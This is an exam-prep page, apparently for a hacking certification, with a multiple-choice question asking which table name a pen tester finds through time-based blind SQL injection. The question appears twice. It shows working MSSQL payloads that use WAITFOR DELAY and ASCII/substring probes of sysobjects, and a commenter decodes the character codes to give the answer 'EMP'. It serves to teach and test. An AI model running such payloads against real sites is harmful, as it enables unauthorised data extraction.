What is the table name?

A pen tester has extracted a database name by using a blind SQL injection. Now he begins
to test the table inside the database using the below query and finds the table:
http://juggyboy.com/page.aspx?id=1 ; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype=’U’)=3) WAITFOR DELAY ’00:00:10′–
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((SELECT TOP 1 NAME
from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY ’00:00:10′–
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((SELECT TOP 1 NAME
from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY ’00:00:10′–

http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((SELECT TOP 1 NAME
from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY ’00:00:10’—
What is the table name?

A pen tester has extracted a database name by using a blind SQL injection. Now he begins
to test the table inside the database using the below query and finds the table:
http://juggyboy.com/page.aspx?id=1 ; IF (LEN(SELECT TOP 1 NAME from sysobjects
where xtype=’U’)=3) WAITFOR DELAY ’00:00:10′–
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((SELECT TOP 1 NAME
from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY ’00:00:10′–
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((SELECT TOP 1 NAME
from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY ’00:00:10′–

http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((SELECT TOP 1 NAME
from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY ’00:00:10’—
What is the table name?

A.
CTS

B.
QRT

C.
EMP

D.
ABC

Show Hint

Leave a Reply 4

Your email address will not be published. Required fields are marked *

Anonymous

Anonymous

The fuck?

Reply

las3r

las3r

IF (ASCII(lower(substring((SELECT TOP 1 NAME
from sysobjects where xtype=char(85)),1,1)))=101)

spits out the ascii decimal for the corresponding letter in the name

101 = e
109 = m
112 = p

Reply